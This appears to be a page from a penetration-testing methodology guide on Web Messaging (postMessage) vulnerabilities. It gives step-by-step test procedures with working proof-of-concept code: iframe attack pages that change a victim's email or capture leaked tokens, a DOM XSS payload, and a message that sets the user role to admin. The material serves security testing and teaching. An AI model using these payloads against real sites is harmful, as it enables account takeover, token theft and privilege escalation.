search

Web Messaging

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
Missing Origin Validation in postMessage Listener

1

Open the application in browser

2

Inspect JavaScript files for message event listeners

window.addEventListener("message", function(event){
   processMessage(event.data);
});
3

Verify whether origin validation is implemented

if(event.origin !== "https://trusted.com") return;
4

If no origin check exists, listener accepts messages from any domain

5

Login to your account, Open browser console and send crafted message manually

window.postMessage({action:"changeEmail",email:"attacker@test.com"},"*");
6

If application processes message without validating origin, improper Web Messaging validation exists, Create external PoC page

<html>
<body>
<iframe id="target" src="https://target.com"></iframe>
<script>
setTimeout(function(){
 document.getElementById("target").contentWindow.postMessage(
   {action:"changeEmail",email:"attacker@test.com"},
   "*"
 );
},3000);
</script>
</body>
</html>
7

Host the PoC on attacker domain

8

Open PoC while authenticated to target.com, If sensitive action is executed, missing origin validation in Web Messaging is confirmed

hashtag
Wildcard Target Origin Usage

1

Inspect application JavaScript for outgoing postMessage calls

otherWindow.postMessage({token:authToken},"*");
2

If target origin is set to "*", sensitive data may be exposed

3

Create malicious page embedding target application via iframe

<iframe id="victim" src="https://target.com"></iframe>
<script>
window.addEventListener("message",function(e){
   console.log("Leaked data:",e.data);
});
</script>
4

If target application sends authentication token or sensitive information via postMessage with wildcard origin, data leakage occurs

5

If attacker page receives sensitive data without restriction, Web Messaging misconfiguration is confirmed

hashtag
Insecure Message Handling Leading to DOM XSS

1

Inspect message handler logic

window.addEventListener("message",function(e){
   document.getElementById("output").innerHTML = e.data;
});
2

If message data is written directly to DOM without sanitization, XSS risk exists

3

Login and open console and Send malicious message

window.postMessage('<img src=x onerror=alert(1)>',"*");
4

If JavaScript executes in application context, DOM-based XSS via Web Messaging is confirmed

5

Create external PoC page sending malicious payload through iframe

6

If payload executes while victim is authenticated, stored or reflected DOM XSS through Web Messaging is confirmed

hashtag
Privilege Escalation via Message Parameter Manipulation

1

Inspect message listener controlling role or state:

window.addEventListener("message",function(e){
   if(e.data.role){
      user.role = e.data.role;
   }
});
2

Open console and send manipulated role

window.postMessage({role:"admin"},"*");
3

Attempt to access admin endpoint

GET /api/admin/dashboard HTTP/1.1
Host: target.com
Cookie: session=abc123
4

If server trusts client-side role modified via message event and grants privileged access, integrity control through Web Messaging is broken

5

If unauthorized privilege escalation occurs due to unvalidated postMessage data, Web Messaging vulnerability is confirmed

hashtag
White Box

hashtag
Cheat Sheet

PreviousWebSocketsNextBrowser Storage

Last updated